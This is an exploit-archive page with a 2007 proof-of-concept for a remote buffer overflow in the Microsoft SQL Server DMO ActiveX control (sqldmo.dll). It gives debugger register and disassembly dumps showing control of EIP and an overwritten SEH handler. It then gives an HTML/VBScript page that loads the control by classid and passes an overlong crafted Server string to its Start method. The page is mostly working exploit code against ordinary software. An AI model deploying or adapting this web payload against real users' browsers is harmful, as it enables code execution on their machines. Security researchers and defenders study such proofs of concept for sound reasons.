Home / exploitsPDF  

mssql-overflow.txt

Posted on 08 September 2007

<!-- 18.48 01/09/2007 Microsoft SQL Server Distributed Management Objects OLE DLL for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow poc file version: 2000.085.2004.00 product version: 8.05.2004 passing some fuzzy chars to Start method: EAX 00000000 ECX 00620062 EDX 00620062 EBX 1C3A3638 SQLDMO.1C3A3638 ESP 0013D87C EBP 0013DAA8 ESI 03042544 EDI 0013DAA0 ASCII "|T" EIP 1C1C9800 SQLDMO.1C1C9800 ... 1C1C97EA 8D8D E4FDFFFF LEA ECX,DWORD PTR SS:[EBP-21C] 1C1C97F0 51 PUSH ECX 1C1C97F1 8B95 E0FDFFFF MOV EDX,DWORD PTR SS:[EBP-220] 1C1C97F7 8B02 MOV EAX,DWORD PTR DS:[EDX] 1C1C97F9 8B8D E0FDFFFF MOV ECX,DWORD PTR SS:[EBP-220] 1C1C97FF 51 PUSH ECX 1C1C9800 FF90 DC010000 CALL DWORD PTR DS:[EAX+1DC] <--- exception access violation when reading 000001DC by manipulating edx you have the first exploitable condition... also seh is overwritten, then: EAX 00000000 ECX 00610061 EDX 7C9137D8 ntdll.7C9137D8 EBX 00000000 ESP 0013D4AC EBP 0013D4CC ESI 00000000 EDI 00000000 EIP 00610061 object safety report: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True means: works according to security settings for the Internet zone needs Activex "not marked as safe" option set to "ask" or "enabled" (not the predefined one) rgod. http://retrogod.altervista.org --> <html> <object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object> <script language='vbscript'> targetFile = "C:ProgrammiMicrosoft SQL Server80ToolsBinnsqldmo.dll" prototype = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )" memberName = "Start" progid = "SQLDMO.SQLServer" argCount = 4 'edx = ecx edx ="bb" seh ="aa" StartMode =True Server ="http://ZZZZYYYYXXXXWW?WVVVVAAAAAAAAAAAAAAAAAA@AA es est est es. testMMMMLLLLKKKJJJJIIIIHH.HGGGGGFFFFEEEEDDDCCCCBBBBAAAA\\\\:#$%AAAABBBBCCCCDD?DEEEEFFFFGGG\:#$%HHHHHIIII e@st es est est es.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBBAAAAZZ\\\\:#$%YYYYXXXXWWWWVV?VUUUUTTTTSSS\:#$%RRRRRQQQQPP@PPOOONNNNMMMMLLL.KKKKKJJJJIIIIHHHGGGGFFFFEE.EDDDDDCCCCBBBBAAAAAAAAAAAAAAA\\\\:#$%AAAAAAAAAAAAAA?Awwwwvvvvuuu\:#$% ttttssss r@rrqqqppppoooo nn.mmmmmllllkkkkjjjiiiihhhhgg.gfffffeeeeddddcccbbbaaaaAAAA\\\" Login ="aaaaaaaa" Password ="bbbbbbbb" SQLServer.Start StartMode ,Server ,Login ,Password </script> </html> original url: http://retrogod.altervista.org/microsoft_sqldmo.html

 

TOP

Malware :